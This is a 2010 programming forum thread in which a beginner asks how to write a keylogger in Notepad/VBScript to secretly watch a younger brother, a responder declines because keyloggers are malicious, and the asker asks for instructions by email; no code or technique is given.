none
Keylogger using Notepad. Windows XP

Pregunta

• Can I make a keylogger, using NOTHING but notepad?

Is it possible?

I am a COMPLETE amateur at VBS

I can barely write a program that can open and close a cd tray >.>...

Anyway.

Let me know please.

Thanks,

Young, and learning...Have mercy.
    • Cambiado SJWhiteley lunes, 26 de julio de 2010 13:06 (From:Visual Basic General)
    domingo, 25 de julio de 2010 5:54

Todas las respuestas

• Why not create simple an application with a textbox, that is almost a notepad,

Because of the fact that keylogers are base of malicious code, is it not clean to show that in a forum.

Success
    Cor
    domingo, 25 de julio de 2010 5:57
  • I'm sorry, relatively new to the programming side of computers.

I was more into the Sys. Admin. side.

My little brother however seems to be...

Creating a .bat file....

I would like to know what it is...

I'm hoping he is putting his knowledge to GOOD use...

But, I am STILL curious none the less.

Sure he's only 13 but, still...

The reason why I am asking for a keylogger, is because he is doing this ONLINE, somewhere, on some site and saving it there.

What's more is that he's using MY computer.

I would rather NOT have him getting ME in trouble since the P.C. is primarily mine.

How do I KNOW, I've walked in on him several times... only to see him closing a window with various code, like I said, COMPLETE amateur... so who knows.

Id LOVE to tell our parents but... well I'm not sure they know what email is.

So, I doubt they would do anything >.>...

The only reason I know it's a .bat or something is because I can go to my history, and see his activity and it is saved on some random like social site and the file is called like .bat.

I know this is not clean, to show on a forum, so if you could perhaps email me the instructions?

darkwolf(at)gmx.com

(At)=@

And seriously.

What's a textbox?

are we talking like

mgsbox=

stuff or like, something else?